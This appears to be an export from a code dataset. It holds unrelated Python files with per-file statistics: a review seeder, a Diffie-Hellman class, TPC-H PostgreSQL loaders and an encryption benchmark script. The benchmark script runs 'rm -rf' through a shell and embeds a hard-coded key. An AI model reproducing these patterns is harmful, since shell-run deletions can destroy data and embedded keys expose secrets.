        (3, awesome, 13, 6), (4, treasure, 36, 9), (3, treasure, 30, 8), (3, master, 24, 5),
        (5, loved, 19, 3), (5, master, 30, 5), (4, wrong, 22, 6), (3, master, 28, 8),
        (4, awesome, 47, 6), (5, awesome, 13, 9), (3, great, 23, 7), (4, treasure, 49, 8),
        (5, awesome, 19, 6), (5, treasure, 10, 5), (5, genius, 29, 5), (3, genius, 27, 4),
        (5, never, 28, 5), (4, family, 48, 8), (5, family, 41, 10), (4, wrong, 2, 5),
        (5, awesome, 36, 6), (5, master, 33, 7), (4, great, 21, 9), (4, loved, 1, 9),
        (5, family, 10, 9), (5, wrong, 32, 4), (5, easy, 14, 8), (4, family, 48, 9),
        (4, never, 7, 5), (3, easy, 20, 3), (4, awesome, 36, 9), (4, genius, 16, 6),
        (5, loved, 42, 6), (3, genius, 15, 9), (5, treasure, 37, 10), (5, master, 39, 6),
        (5, easy, 28, 8), (4, loved, 7, 8), (4, wrong, 15, 9), (5, wrong, 24, 6),
        (4, master, 23, 4), (5, awesome, 5, 7), (5, wrong, 19, 6), (5, loved, 32, 4),
        (4, great, 1, 10), (3, master, 42, 5), (3, genius, 17, 5), (5, never, 26, 8),
        (5, treasure, 12, 9), (3, wrong, 21, 10), (4, treasure, 7, 3), (4, master, 40, 6),
        (3, wrong, 3, 6), (5, awesome, 18, 10), (3, awesome, 19, 9), (3, easy, 25, 3),
        (3, great, 38, 6), (5, great, 4, 5), (4, master, 2, 5), (4, loved, 14, 4),
        (5, family, 20, 3), (4, family, 26, 9), (3, never, 28, 4), (3, loved, 9, 7),
        (5, treasure, 9, 5), (5, family, 30, 4), (3, awesome, 8, 6), (3, treasure, 45, 3),
        (4, family, 11, 4), (3, never, 16, 4), (4, easy, 41, 10), (4, great, 4, 6),
        (4, family, 3, 8), (3, loved, 29, 9), (4, never, 13, 9), (4, great, 1, 4),
        (5, loved, 8, 6), (4, awesome, 27, 9), (4, wrong, 22, 3), (5, genius, 42, 9),
        (5, great, 34, 5), (3, treasure, 20, 6), (5, genius, 41, 4), (3, loved, 18, 4),
        (5, great, 38, 5), (5, easy, 20, 3), (3, awesome, 38, 6), (5, great, 15, 6),
        (3, easy, 28, 5), (3, never, 39, 7), (5, awesome, 20, 5), (5, genius, 43, 9),
        (5, awesome, 25, 5), (3, wrong, 31, 4), (3, great, 27, 4), (5, great, 8, 6),
        (5, great, 35, 5), (5, treasure, 20, 3), (4, easy, 46, 6), (3, wrong, 41, 10),
        (5, loved, 29, 7), (4, wrong, 26, 8), (5, great, 2, 5), (3, genius, 4, 6),
        (4, wrong, 12, 5), (3, family, 29, 10), (4, great, 39, 9), (3, family, 31, 10),
        (4, never, 16, 4), (3, genius, 28, 6), (5, great, 5, 8), (5, great, 15, 3),
        (5, never, 2, 10), (3, wrong, 33, 9), (4, loved, 25, 8), (5, wrong, 4, 10),
        (5, great, 33, 10), (5, family, 4, 10), (4, loved, 16, 10), (5, master, 31, 7),
        (4, easy, 23, 6), (3, great, 19, 7), (4, awesome, 40, 5), (5, family, 16, 7),
        (3, family, 2, 4), (5, master, 5, 5), (5, awesome, 24, 3), (4, never, 30, 5),
        (3, genius, 35, 9), (4, never, 25, 4), (4, awesome, 5, 8), (5, awesome, 18, 9),
        (3, wrong, 35, 7), (5, wrong, 32, 5), (4, treasure, 32, 9), (4, treasure, 29, 6),
        (3, treasure, 24, 9), (5, family, 32, 10), (3, easy, 2, 7), (4, easy, 6, 6),
    ]

    db.session.bulk_insert_mappings(
        Review,
        [
            {"overall": overall, "review": review, "recipeId": recipe_id, "userId": user_id}
            for overall, review, recipe_id, user_id in rows
        ],
    )
    db.session.commit()
# Uses a raw SQL query to TRUNCATE the reviews table.
# SQLAlchemy doesn't have a built-in function to do this.
# TRUNCATE removes all the data from the table and resets
# the auto-incrementing primary key.
def undo_reviews():
    db.session.execute('TRUNCATE reviews;')
    db.session.commit()
| 56.959117
| 113
| 0.160692
| 2,567
| 69,661
| 4.359174
| 0.055707
| 0.056479
| 0.098838
| 0.037534
| 0.952904
| 0.90286
| 0.888293
| 0.808311
| 0.74647
| 0.68588
| 0
| 0.05081
| 0.779346
| 69,661
| 1,222
| 114
| 57.005728
| 0.677184
| 0.003818
| 0
| 0.657851
| 0
| 0
| 0.159824
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001653
| true
| 0
| 0.000826
| 0
| 0.002479
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
12d3d03d0b49088a3581186d8746a2f03cf5cccc
| 8,476
|
py
|
Python
|
diffie-hellman.py
|
draescherl/diffie-hellman
|
bf9623233d6dd74e0821b9f8a7c8ae99f80a2930
|
[
"Apache-2.0"
] | null | null | null |
diffie-hellman.py
|
draescherl/diffie-hellman
|
bf9623233d6dd74e0821b9f8a7c8ae99f80a2930
|
[
"Apache-2.0"
] | null | null | null |
diffie-hellman.py
|
draescherl/diffie-hellman
|
bf9623233d6dd74e0821b9f8a7c8ae99f80a2930
|
[
"Apache-2.0"
] | null | null | null |
from os import urandom
from sys import exit
# The standardized MODP Diffie-Hellman groups from RFC 3526
# (https://tools.ietf.org/html/rfc3526), keyed by their RFC group id.
# Each entry is a safe prime `p` and the generator `g` for that group.
# NOTE: the 8192-bit prime was previously split across two physical lines,
# which was a SyntaxError; the literal is now a single line again.
groups = {
    # 1536-bit
    5: {
        "prime": 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA237327FFFFFFFFFFFFFFFF,
        "generator": 2
    },
    # 2048-bit
    14: {
        "prime": 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF,
        "generator": 2
    },
    # 3072-bit
    15: {
        "prime": 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF,
        "generator": 2
    },
    # 4096-bit
    16: {
        "prime": 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C934063199FFFFFFFFFFFFFFFF,
        "generator": 2
    },
    # 6144-bit
    17: {
        "prime": 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DCC4024FFFFFFFFFFFFFFFF,
        "generator": 2
    },
    # 8192-bit
    18: {
        "prime": 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A92108011A723C12A787E6D788719A10BDBA5B2699C327186AF4E23C1A946834B6150BDA2583E9CA2AD44CE8DBBBC2DB04DE8EF92E8EFC141FBECAA6287C59474E6BC05D99B2964FA090C3A2233BA186515BE7ED1F612970CEE2D7AFB81BDD762170481CD0069127D5B05AA993B4EA988D8FDDC186FFB7DC90A6C08F4DF435C93402849236C3FAB4D27C7026C1D4DCB2602646DEC9751E763DBA37BDF8FF9406AD9E530EE5DB382F413001AEB06A53ED9027D831179727B0865A8918DA3EDBEBCF9B14ED44CE6CBACED4BB1BDB7F1447E6CC254B332051512BD7AF426FB8F401378CD2BF5983CA01C64B92ECF032EA15D1721D03F482D7CE6E74FEF6D55E702F46980C82B5A84031900B1C9E59E7C97FBEC7E8F323A97A7E36CC88BE0F1D45B7FF585AC54BD407B22B4154AACC8F6D7EBF48E1D814CC5ED20F8037E0A79715EEF29BE32806A1D58BB7C5DA76F550AA3D8A1FBFF0EB19CCB1A313D55CDA56C9EC2EF29632387FE8D76E3C0468043E8F663F4860EE12BF2D5B0B7474D6E694F91E6DBE115974A3926F12FEE5E438777CB6A932DF8CD8BEC4D073B931BA3BC832B68D9DD300741FA7BF8AFC47ED2576F6936BA424663AAB639C5AE4F5683423B4742BF1C978238F16CBE39D652DE3FDB8BEFC848AD922222E04A4037C0713EB57A81A23F0C73473FC646CEA306B4BCBC8862F8385DDFA9D4B7FA2C087E879683303ED5BDD3A062B3CF5B3A278A66D2A13F83F44F82DDF310EE074AB6A364597E899A0255DC164F31CC50846851DF9AB48195DED7EA1B1D510BD7EE74D73FAF36BC31ECFA268359046F4EB879F924009438B481C6CD7889A002ED5EE382BC9190DA6FC026E479558E4475677E9AA9E3050E2765694DFC81F56E880B96E7160C980DD98EDD3DFFFFFFFFFFFFFFFFF,
        "generator": 2
    }
}
# Class to implement the Diffie-Hellman key-exchange algorithm.
# For a simple example of how this algorithm works, see
# https://en.wikipedia.org/wiki/Diffie%E2%80%93Hellman_key_exchange#Cryptographic_explanation
class DiffieHellman:
    """Diffie-Hellman key exchange over a fixed RFC 3526 MODP group."""

    # Instantiate the class by naming one of the RFC 3526 g/p pairs
    # (a key of the module-level `groups` dict).
    # 2048-bit (group 14) is the minimum recommended length.
    def __init__(self, group=14):
        if group in groups:
            self.__p = groups[group]["prime"]
            self.__g = groups[group]["generator"]
        else:
            print("Group not supported :", group)
            exit()
        # 256 bits of OS randomness (Linux getrandom() via urandom), read as
        # a hex string and parsed into the private exponent.
        self.__private_key = int(urandom(32).hex(), base=16)

    # Getter for the private key
    def get_private_key(self):
        return self.__private_key

    # Compute g^a mod p where a is the private key
    def generate_pubkey(self):
        return pow(self.__g, self.__private_key, self.__p)

    # Basic strength check on the partner's pubkey (was a TODO that
    # unconditionally returned True): reject anything outside [2, p-2].
    # The values 0, 1 and p-1 would force a trivial shared secret
    # (small-subgroup / degenerate-key attack).
    def __check_other_pubkey(self, other_pubkey):
        return 2 <= other_pubkey <= self.__p - 2

    # Compute B^a mod p where B is the partner's pubkey; returns the
    # shared secret as a hex string, or exits on an unacceptable key.
    def gen_shared_key(self, other_pubkey):
        if self.__check_other_pubkey(other_pubkey):
            self.__shared_key = pow(other_pubkey, self.__private_key, self.__p)
            return hex(self.__shared_key)
        else:
            print("Unsupported partner key")
            exit()
# Smoke test: two independent parties exchange public keys and one side
# derives the shared secret.
alice = DiffieHellman()
bob = DiffieHellman()
alice_pub = alice.generate_pubkey()
bob_pub = bob.generate_pubkey()
s = alice.gen_shared_key(bob_pub)
print("s =", s)
| 88.291667
| 2,068
| 0.895116
| 288
| 8,476
| 26.149306
| 0.416667
| 0.009295
| 0.007436
| 0.004249
| 0.010357
| 0
| 0
| 0
| 0
| 0
| 0
| 0.493927
| 0.077277
| 8,476
| 96
| 2,069
| 88.291667
| 0.468994
| 0.079873
| 0
| 0.178571
| 0
| 0
| 0.01864
| 0
| 0
| 1
| 0.807816
| 0.010417
| 0
| 1
| 0.089286
| false
| 0
| 0.035714
| 0.053571
| 0.214286
| 0.053571
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
12f914556ba67c0084c1d1f6a92e6df505191b6f
| 4,461
|
py
|
Python
|
tpch4pgsql/load.py
|
bombehub/tpch-pgsql
|
f377df82766603f5795ad05a8a101f08526358d7
|
[
"Apache-2.0"
] | null | null | null |
tpch4pgsql/load.py
|
bombehub/tpch-pgsql
|
f377df82766603f5795ad05a8a101f08526358d7
|
[
"Apache-2.0"
] | null | null | null |
tpch4pgsql/load.py
|
bombehub/tpch-pgsql
|
f377df82766603f5795ad05a8a101f08526358d7
|
[
"Apache-2.0"
] | null | null | null |
import os
from tpch4pgsql import postgresqldb as pgdb
def clean_database(query_root, host, port, db_name, user, password, tables):
    """Drops the tables if they exist.

    Args:
        query_root (str): Directory in which generated queries directory exists
        host (str): IP/hostname of the PG instance
        port (int): port for the PG instance
        db_name (str): name of the tpch database
        user (str): user for the PG instance
        password (str): password for the PG instance
        tables (str): list of tables
    Return:
        0 if successful
        non zero otherwise
    """
    try:
        conn = pgdb.PGDB(host, port, db_name, user, password)
    except Exception as e:
        print("unable to connect to the database. %s" % e)
        return 1
    # Close the connection on every path (it was previously leaked when a
    # DROP failed).
    try:
        try:
            for table in tables:
                conn.executeQuery("DROP TABLE IF EXISTS %s " % table)
        except Exception as e:
            print("unable to remove existing tables. %s" % e)
            return 1
        print("dropped existing tables")
        conn.commit()
        return 0
    finally:
        conn.close()
def create_schema(query_root, host, port, db_name, user, password, prep_query_dir):
    """Creates the schema for the tests. Drops the tables if they exist.

    Args:
        query_root (str): Directory in which generated queries directory exists
        host (str): IP/hostname of the PG instance
        port (int): port for the PG instance
        db_name (str): name of the tpch database
        user (str): user for the PG instance
        password (str): password for the PG instance
        prep_query_dir (str): directory with queries for schema creation
    Return:
        0 if successful
        non zero otherwise
    """
    try:
        conn = pgdb.PGDB(host, port, db_name, user, password)
    except Exception as e:
        print("unable to connect to the database. %s" % e)
        return 1
    # Close the connection on every path (it was previously leaked when the
    # create-tables script failed).
    try:
        try:
            conn.executeQueryFromFile(os.path.join(query_root, prep_query_dir, "create_tbl.sql"))
        except Exception as e:
            print("unable to run create tables. %s" % e)
            return 1
        conn.commit()
        # BUG FIX: the function documented "0 if successful" but fell through
        # returning None on success.
        return 0
    finally:
        conn.close()
def load_tables(data_dir, host, port, db_name, user, password, tables, load_dir):
    """Loads data into tables. Expects that tables are already empty.

    Args:
        data_dir (str): Directory in which load data exists
        host (str): IP/hostname of the PG instance
        port (int): port for the PG instance
        db_name (str): name of the tpch database
        user (str): user for the PG instance
        password (str): password for the PG instance
        tables (str): list of tables
        load_dir (str): directory with data files to be loaded
    Return:
        0 if successful
        non zero otherwise
    """
    try:
        conn = pgdb.PGDB(host, port, db_name, user, password)
    except Exception as e:
        print("unable to connect to the database. %s" % e)
        return 1
    # Close the connection on every path (it was previously leaked when a
    # COPY failed).
    try:
        try:
            for table in tables:
                # Data files are named <table>.tbl.csv, pipe-separated.
                filepath = os.path.join(data_dir, load_dir, table.lower() + ".tbl.csv")
                conn.copyFrom(filepath, separator="|", table=table.lower())
            conn.commit()
        except Exception as e:
            print("unable to run load tables. %s" % e)
            return 1
        return 0
    finally:
        conn.close()
def index_tables(query_root, host, port, db_name, user, password, prep_query_dir):
    """Create indexes and foreign keys for the already-loaded tables.

    Runs ``<query_root>/<prep_query_dir>/create_idx.sql`` against the database.

    Args:
        query_root (str): Directory in which preparation queries directory exists
        host (str): IP/hostname of the PG instance
        port (int): port for the PG instance
        db_name (str): name of the tpch database
        user (str): user for the PG instance
        password (str): password for the PG instance
        prep_query_dir (str): directory with create index script
    Return:
        0 if successful
        non zero otherwise
    """
    try:
        conn = pgdb.PGDB(host, port, db_name, user, password)
        try:
            idx_script = os.path.join(query_root, prep_query_dir, "create_idx.sql")
            conn.executeQueryFromFile(idx_script)
            conn.commit()
        except Exception as exc:
            print("unable to run index tables. %s" % exc)
            return 1
        conn.close()
        return 0
    except Exception as exc:
        print("unable to connect to the database. %s" % exc)
        return 1
| 34.053435
| 97
| 0.60928
| 603
| 4,461
| 4.434494
| 0.174129
| 0.029918
| 0.077786
| 0.071803
| 0.786462
| 0.780853
| 0.773747
| 0.735976
| 0.710172
| 0.710172
| 0
| 0.005203
| 0.310693
| 4,461
| 130
| 98
| 34.315385
| 0.86439
| 0.421206
| 0
| 0.737705
| 0
| 0
| 0.151631
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.065574
| false
| 0.131148
| 0.032787
| 0
| 0.278689
| 0.147541
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
12fd36c031ee93bf7da6c5662b6bf742e39bc47b
| 4,591
|
py
|
Python
|
test_scripts/test_time.py
|
piaolaidelangman/xgboost-spark-sgx
|
305693e3e10436802d3f399df451305e5baf2056
|
[
"Apache-2.0"
] | null | null | null |
test_scripts/test_time.py
|
piaolaidelangman/xgboost-spark-sgx
|
305693e3e10436802d3f399df451305e5baf2056
|
[
"Apache-2.0"
] | null | null | null |
test_scripts/test_time.py
|
piaolaidelangman/xgboost-spark-sgx
|
305693e3e10436802d3f399df451305e5baf2056
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
import subprocess
# Benchmark the SplitAndEncryptForXgboost job: for each input file size,
# run it with several split counts, time each run `avg_times` times, and
# append one CSV row per (size, splits) configuration to time.csv.
#
# NOTE(review): the command embeds what looks like a hard-coded encryption
# key and runs `rm -rf` through a shell (subprocess.getstatusoutput) —
# confirm both are acceptable for this internal benchmark script.

# Number of timed runs averaged per configuration.
avg_times = 3

# Split counts to benchmark for each input size (GB). The previous version
# duplicated the whole measurement loop once per size; a single table keeps
# the sizes and their split ranges in one place. Insertion order preserves
# the original 8 -> 16 -> 32 measurement order.
split_ranges = {
    8: [32, 64, 128, 256],
    16: [64, 128, 256, 512],
    32: [128, 256, 512],
}

with open("time.csv", 'w') as timeFile:
    timeFile.write("filesize, splitnum, time1, time2, time3, averagetime\n")
    for size_gb, splits in split_ranges.items():
        for split_num in splits:
            sentence = ((str(size_gb) + "G, ") + str(split_num) + ", ")
            total_time = 0
            for _ in range(avg_times):
                cmd = ("""rm -rf ~/diankun/Output/* && java -cp target/xgboostsparksgx-1.0-SNAPSHOT-jar-with-dependencies.jar xgboostsparksgx.SplitAndEncryptForXgboost ~/diankun/data/"""
                       + str(size_gb)
                       + """G_data LDlxjm0y3HdGFniIGviJnMJbmFI+lt3dfIVyPJm1YSY= ~/diankun/Output """
                       + str(split_num))
                ret, val = subprocess.getstatusoutput(cmd)
                # The job prints its elapsed time on a line containing
                # "time"; field 3 of that line is the number of interest.
                for line in val.split("\n"):
                    if "time" in line:
                        tmpTime = line.split(" ")[3]
                        sentence += (tmpTime + ", ")
                        total_time += int(tmpTime)
                        break
            avg_time = int(total_time / avg_times)
            sentence += str(avg_time)
            print("SUCCESS SUCCESS " + sentence)
            timeFile.write(sentence + "\n")
| 52.170455
| 285
| 0.503812
| 466
| 4,591
| 4.890558
| 0.165236
| 0.047389
| 0.017552
| 0.022817
| 0.893374
| 0.893374
| 0.893374
| 0.893374
| 0.893374
| 0.893374
| 0
| 0.036948
| 0.36332
| 4,591
| 87
| 286
| 52.770115
| 0.74273
| 0.251797
| 0
| 0.725806
| 0
| 0.048387
| 0.245311
| 0.12837
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.048387
| 0
| 0.048387
| 0.048387
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
426cda52940b716e13d0202c76e1aa5f0c599e1b
| 275
|
py
|
Python
|
pqe/cdf_ops/__init__.py
|
SsnL/poisson_quasimetric_embedding
|
ea8f1b66ce648dcd6cb53208674d0ee4c352dbaf
|
[
"BSD-3-Clause"
] | 9
|
2022-03-15T04:23:25.000Z
|
2022-03-29T09:53:18.000Z
|
pqe/cdf_ops/__init__.py
|
SsnL/poisson_quasimetric_embedding
|
ea8f1b66ce648dcd6cb53208674d0ee4c352dbaf
|
[
"BSD-3-Clause"
] | 1
|
2022-03-24T02:20:41.000Z
|
2022-03-24T02:22:27.000Z
|
pqe/cdf_ops/__init__.py
|
SsnL/poisson_quasimetric_embedding
|
ea8f1b66ce648dcd6cb53208674d0ee4c352dbaf
|
[
"BSD-3-Clause"
] | null | null | null |
# Re-export the CDF / Bessel / two-Poisson helpers from the wrapper module
# so callers can import them directly from this subpackage.
# (Fixed: removed a redundant backslash line-continuation — inside
# parentheses the implicit continuation already applies.)
from .op_wrappers import (
    chndtr, i0, i0e, i1, i1e, prob_two_poisson_gt, prob_two_poisson_le,
    ndtr, log_ndtr, prod_ndtr
)

# Explicit public API of this subpackage.
__all__ = [
    'chndtr', 'i0', 'i0e', 'i1', 'i1e',
    'prob_two_poisson_gt', 'prob_two_poisson_le',
    'ndtr', 'log_ndtr', 'prod_ndtr',
]
| 25
| 73
| 0.647273
| 41
| 275
| 3.829268
| 0.439024
| 0.178344
| 0.356688
| 0.165605
| 0.853503
| 0.853503
| 0.853503
| 0.853503
| 0.853503
| 0.853503
| 0
| 0.035714
| 0.185455
| 275
| 10
| 74
| 27.5
| 0.665179
| 0
| 0
| 0
| 0
| 0
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4277f9b57bb26b23afbc6e7f0f3f795303902efc
| 192
|
py
|
Python
|
plugins/rapid7_insight_agent/icon_rapid7_insight_agent/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 46
|
2019-06-05T20:47:58.000Z
|
2022-03-29T10:18:01.000Z
|
plugins/rapid7_insight_agent/icon_rapid7_insight_agent/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 386
|
2019-06-07T20:20:39.000Z
|
2022-03-30T17:35:01.000Z
|
plugins/rapid7_insight_agent/icon_rapid7_insight_agent/actions/__init__.py
|
lukaszlaszuk/insightconnect-plugins
|
8c6ce323bfbb12c55f8b5a9c08975d25eb9f8892
|
[
"MIT"
] | 43
|
2019-07-09T14:13:58.000Z
|
2022-03-28T12:04:46.000Z
|
# GENERATED BY KOMAND SDK - DO NOT EDIT
from .check_agent_status.action import CheckAgentStatus
from .get_agent_details.action import GetAgentDetails
from .quarantine.action import Quarantine
| 38.4
| 55
| 0.848958
| 26
| 192
| 6.115385
| 0.692308
| 0.226415
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 192
| 4
| 56
| 48
| 0.929825
| 0.192708
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4292041f8302b116a7d3fe3558b887531451209d
| 8,888
|
py
|
Python
|
venv/Lib/site-packages/numpy/typing/tests/data/reveal/mod.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 41
|
2021-06-19T13:57:18.000Z
|
2021-12-02T17:08:53.000Z
|
venv/Lib/site-packages/numpy/typing/tests/data/reveal/mod.py
|
EkremBayar/bayar
|
aad1a32044da671d0b4f11908416044753360b39
|
[
"MIT"
] | 14
|
2021-03-26T20:54:22.000Z
|
2021-04-06T17:18:53.000Z
|
venv/Lib/site-packages/numpy/typing/tests/data/reveal/mod.py
|
EkremBayar/bayar
|
